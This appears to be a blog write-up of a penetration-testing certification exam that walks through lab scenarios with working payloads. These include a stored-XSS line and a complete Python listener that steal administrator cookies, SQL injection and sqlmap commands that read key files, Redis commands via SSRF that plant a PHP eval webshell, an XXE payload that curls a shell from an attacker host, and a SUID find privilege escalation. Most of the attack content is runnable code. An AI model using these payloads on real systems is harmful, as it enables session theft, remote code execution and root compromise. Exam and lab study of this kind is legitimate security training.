lca

True unfreedom is building a cage inside your own heart.

cisp-pts exam records

The PTS exam took less than half a month from registration to the test. If you have practised the question bank it is quite easy to pass, because many questions are basically the same as the training material. There are some questions that even the training institutions cannot answer, though. For example, the last big question in my exam had nacos running inside, and nacos had no ready-made exploit (exp); I tried common weak passwords but could not get in, so I did not attempt it further. Most questions only have 2 keys (20 points), and if you make sure to get every one of the earlier keys you already have 80 points. Anything above 70 points is a pass.

Let me talk about the questions I encountered in the exam.

Scenario 1

xss+sqli+file reading, quite simple

For the XSS you start a web service with Python on the attacking machine, then insert the payload. The question has a stored XSS, so the payload is saved into the page and sends the administrator's cookie back to that server when the administrator views it.

<script>document.write('<img src="http://ip:1234/?cookie='+document.cookie+'" />')</script>

That yields the administrator's cookie.

In the browser, right-click the page, choose Inspect, open the Application tab, find Storage > Cookies and replace your own cookie with the administrator's.
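The listener the payload above calls back to, as an added example written for this page rather than taken from the original post. It assumes the attacking machine listens on port 1234 (the port in the payload) and logs whatever arrives in the cookie query parameter; the handler name, the percent-encoding variant of the payload and the GIF response body are my choices, not the exam's.

```python
#!/usr/bin/env python3
"""Cookie catcher for the stored-XSS step: logs the 'cookie' query parameter
of every GET, then answers with a tiny GIF so the injected image loads quietly.
Added example for this write-up; not code from the original post."""
import http.server
import socketserver
from urllib.parse import parse_qs, urlparse

LISTEN_PORT = 1234   # matches the port used in the XSS payload (assumption)
CAPTURED = []        # every cookie string received, in arrival order


def extract_cookie(path):
    """Return the decoded 'cookie' query value from a request path, or None.

    parse_qs percent-decodes, so a payload that sends
    encodeURIComponent(document.cookie) arrives as the original cookie string.
    """
    values = parse_qs(urlparse(path).query).get("cookie")
    return values[0] if values else None


def xss_payload(host, port=LISTEN_PORT):
    """Stored-XSS payload that exfiltrates document.cookie to host:port.

    Unlike the bare payload in the write-up, the cookie is percent-encoded on
    the way out so ';' and '=' inside it survive the trip through the query string.
    """
    return (
        f"<script>new Image().src='http://{host}:{port}/?cookie='"
        "+encodeURIComponent(document.cookie);</script>"
    )


class CatchHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        cookie = extract_cookie(self.path)
        if cookie is not None:
            CAPTURED.append(cookie)
            print(f"[+] {self.client_address[0]} -> {cookie}")
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.end_headers()
        self.wfile.write(b"GIF89a")   # minimal body; the browser never renders it

    def log_message(self, *args):      # keep the console to captured cookies only
        pass


def serve(port=LISTEN_PORT):
    """Blocks forever; run on the attacking machine before submitting the payload."""
    with socketserver.TCPServer(("0.0.0.0", port), CatchHandler) as srv:
        srv.serve_forever()


if __name__ == "__main__":
    serve()
```

Run it on the attacking machine, submit `xss_payload("<attacker ip>")` into the stored field, and the administrator's cookie is printed when the admin page renders.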


sqli payload

http://ip:3603/admin/edit.php?id=12312/**/UniOn/**/SeLEct/**/1,2,load_file("/var/key2"),4#

Or run sqlmap against the injection point:

http://IP:3603/admin/edit.php?id=11 (GET)
sqlmap.py -u "http://10.52.0.29:3603/admin/edit.php?id=11" --cookie="PHPSESSID=732ece3c4dcdba588d48593d689bf927" --dbms mysql --file-read /var/key2

Arbitrary file reading

http://IP:3603/admin/setting.php?page=/tmp/key3

Scenario 2

ssrf+redis getshell

SSRF: directory scanning finds robots.txt, which leads to backup.zip; unzipping it gives a txt file containing an internal web port. Enter http://localhost:1234 (that port) in the search box the question provides to get the first key.

redis getshell:

Write webshell

dict://localhost:6379/flushall
dict://localhost:6379/set:1:'<?php eval($_POST[1]);?>'
dict://localhost:6379/config:set:dir:/var/www/html/app1
dict://localhost:6379/config:set:dbfilename:a.php
dict://localhost:6379/save

Write private key


That gives the second key; the third key is in the crontab (scheduled tasks).

Scenario 3

An xxe vulnerability

Write a webshell through the expect:// wrapper. expect:// executes a command, so start a web service on the attacking machine that hosts the shell and use curl inside the entity to fetch it onto the target.

Execute command

<?xml version="1.0"?><!DOCTYPE a[<!ENTITY b SYSTEM "expect://id">]><p>&b;</p>

Write shell

<?xml version="1.0"?><!DOCTYPE a[<!ENTITY b SYSTEM "expect://curl$IFS$9-O$IFS$9'192.168.80.48:8088/shell.php'">]><p>&b;</p>

Privilege escalation

find / -perm -u=s -type f 2>/dev/null
find 1 -exec ls /root \;

The first command lists SUID binaries; find itself is SUID here, so -exec runs ls as root. The argument 1 is just an existing file to search (touch 1 first if there is none).